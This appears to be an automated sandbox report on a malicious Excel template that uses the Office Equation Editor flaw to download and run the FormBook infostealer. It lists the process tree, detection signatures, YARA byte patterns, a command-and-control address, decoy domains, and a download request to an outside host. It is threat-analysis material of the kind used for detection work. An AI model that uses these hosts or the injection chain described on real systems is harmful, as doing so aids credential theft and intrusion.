
Windows Analysis Report New_1007572_021.xltx

Overview

General Information

Sample Name: New_1007572_021.xltx
Analysis ID: 458850
MD5: 427e80f30505c596c822c141283a5a70
SHA1: d910f9e9ecf2cb8c68f8fca4121bac4bad757a37
SHA256: d1acfa41b1e1fbc076b41547954e6615132256983b0315c50f8dbb97a0399fbd
Tags: xlsx, xltx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected FormBook
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2624 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2384 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • tynex.exe (PID: 2216 cmdline: C:\Users\Public\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
      • tynex.exe (PID: 3000 cmdline: C:\Users\user\AppData\Local\Temp\tynex.exe MD5: 41137FD61B9CC0D92225C91660A5902C)
        • FB_BFF5.tmp.exe (PID: 2748 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_BFF5.tmp.exe' MD5: 74BAFB3E707C7B0C63938AC200F99C7F)
        • FB_C479.tmp.exe (PID: 2724 cmdline: 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: 48ECE2CA39A9EAE7FCED7418CF071D46)
          • explorer.exe (PID: 1388 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • cscript.exe (PID: 2248 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: A3A35EE79C64A640152B3113E6E254E2)
              • cmd.exe (PID: 1244 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.domoexpra.club/cg53/"], "decoy": ["sugarlushcosmetic.com", "a2net.info", "ximakaya.com", "thevochick.com", "khafto.com", "zsgpbgsbh.icu", "psm-gen.com", "jhxhotei.com", "7991899.com", "nda.today", "fourseasonsvanlines.com", "splediferous.info", "thesqlgoth.com", "newpathequine.com", "advan.digital", "skamanderboats.com", "thejnit.com", "pardusarms.net", "mevasoluciones.com", "biggdogg5n2.com", "anogirl.com", "xinyisanreqi.com", "2mothertruckers.net", "phongvevic.com", "atmosphere.rent", "amabie-net.com", "stocksp24.com", "starseedbeing.com", "icreditmalaysia.com", "inochinokagayaki.net", "christianbooktrailer.com", "gidrot.com", "junglecli.com", "greenportcivic.com", "beyondparenting101.com", "tracisolomon.xyz", "healinghandssalem.com", "hackersincgolf.com", "goselling.solutions", "cumuluspharma.com", "ramblecollections.com", "mac-marine.com", "likeit21.com", "gdlejing.com", "si600.net", "greenhearthome.com", "tourps.com", "lvyi19.com", "frequent420.com", "goodteattirerebates.com", "melanie-gore.com", "comfsresidential.com", "vrgkk.com", "losmaestrosencarpinteria.com", "nikhitaindustries.com", "fresgolens.online", "xpj777.life", "zerkalo-mr-bit-casino.com", "thorsensgrinding.com", "ronniethemole.com", "poundlove.com", "joansv.com", "finneyplace.com", "dakotacntr.com"]}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18409:$sqlite3step: 68 34 1C 7B E1
  • 0x1851c:$sqlite3step: 68 34 1C 7B E1
  • 0x18438:$sqlite3text: 68 38 2A 90 C5
  • 0x1855d:$sqlite3text: 68 38 2A 90 C5
  • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x18573:$sqlite3blob: 68 53 D8 7F 8C

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x88e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x956a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17409:$sqlite3step: 68 34 1C 7B E1
  • 0x1751c:$sqlite3step: 68 34 1C 7B E1
  • 0x17438:$sqlite3text: 68 38 2A 90 C5
  • 0x1755d:$sqlite3text: 68 38 2A 90 C5
  • 0x1744b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17573:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(34 memory dump entries in total; only the first are listed here)

Unpacked PEs

Source | Rule | Description | Author | Strings
7.0.FB_C479.tmp.exe.1340000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
7.0.FB_C479.tmp.exe.1340000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
7.0.FB_C479.tmp.exe.1340000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17609:$sqlite3step: 68 34 1C 7B E1
  • 0x1771c:$sqlite3step: 68 34 1C 7B E1
  • 0x17638:$sqlite3text: 68 38 2A 90 C5
  • 0x1775d:$sqlite3text: 68 38 2A 90 C5
  • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
4.2.tynex.exe.36294d0.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.tynex.exe.36294d0.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0xe5c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0xe82a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x1a34d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x19e39:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1a44f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1a5c7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xf242:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x190b4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xff3b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x201bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x211c2:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 unpacked PE entries in total; only the first are listed here)

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 160.153.129.234, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2384, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2384, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216
Sigma detected: Execution from Suspicious Folder
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\Public\tynex.exe, CommandLine: C:\Users\Public\tynex.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\tynex.exe, NewProcessName: C:\Users\Public\tynex.exe, OriginalFileName: C:\Users\Public\tynex.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2384, ProcessCommandLine: C:\Users\Public\tynex.exe, ProcessId: 2216

Jbx Signature Overview


AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Found malware configuration
Source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp; Malware Configuration Extractor: FormBook (C2 list and decoy domains as given under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe; ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Metadefender: Detection: 45%
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; ReversingLabs: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\tynex.exe; ReversingLabs: Detection: 28%
Source: C:\Users\Public\tynex.exe; ReversingLabs: Detection: 28%
Multi AV Scanner detection for submitted file
Source: New_1007572_021.xltx; ReversingLabs: Detection: 39%
Yara detected FormBook
Source: Yara match; File source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\New_1007572_021[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tynex.exe; Joe Sandbox ML: detected
Source: C:\Users\Public\tynex.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Joe Sandbox ML: detected
Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.tynex.exe.36294d0.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.tynex.exe.39186d0.6.unpack; Avira: Label: TR/Crypt.XPACK.Gen2
Source: 5.2.tynex.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.tynex.exe.276b818.2.unpack; Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\tynex.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\Public\tynex.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: FB_C479.tmp.exe, cscript.exe
Source: Binary string: cscript.pdbN source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb source: FB_C479.tmp.exe, 00000007.00000002.2220113771.0000000000370000.00000040.00000001.sdmp
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Code function: 4x nop then pop esi
Source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe; Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cscript.exe; Code function: 4x nop then pop edi

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.domoexpra.club/cg53/
Source: Joe Sandbox View; ASN Name: GODADDY-AMSDE GODADDY-AMSDE
Source: global traffic; HTTP traffic detected: GET /Di4/New_1007572_021.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: inter-trading-service.com Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\30DB366F.jpg
Source: global traffic; HTTP traffic detected: GET /Di4/New_1007572_021.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: inter-trading-service.com Connection: Keep-Alive
Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp; String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown; DNS traffic detected: queries for: inter-trading-service.com
Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://computername/printers/printername/.printer
Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com
Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp; String found in binary or memory: http://investor.msn.com/
Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XML.asp
Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp; String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp; String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000008.00000000.2176511182.00000000039F0000.00000004.00000001.sdmp; String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp; String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp; String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000008.00000000.2191398155.000000000A330000.00000008.00000001.sdmp; String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000008.00000000.2170296081.0000000001C70000.00000002.00000001.sdmp; String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp; String found in binary or memory: http://www.hotmail.com/oe
Source: tynex.exe, 00000005.00000002.2168389998.0000000002727000.00000002.00000001.sdmp; String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000008.00000000.2177874264.0000000004B50000.00000002.00000001.sdmp; String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp; String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp; String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp3
Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp; String found in binary or memory: http://www.msn.com/de-de/?ocid=iehpT
Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp; String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp; String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: tynex.exe, 00000005.00000002.2167881053.0000000002540000.00000002.00000001.sdmp; String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2177419686.000000000419A000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2177529570.0000000004263000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000008.00000000.2176560776.00000000039F4000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000008.00000000.2188293638.000000000842E000.00000004.00000001.sdmp; String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1k

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.39186d0.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.tynex.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.tynex.exe.37dba40.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000000.2165364225.0000000001341000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2219948973.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2358933329.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163601138.0000000003766000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2166292302.0000000000404000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359161562.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2360905373.0000000002BFF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359102691.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2220838294.0000000001341000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.2359372203.0000000000792000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.2220048817.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163885582.000000000391C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.2163507996.000000000362D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\FB_C479.tmp.exe, type: DROPPED

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.0.FB_C479.tmp.exe.1340000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.tynex.exe.36294d0.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.FB_C479.tmp.exe.1340000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
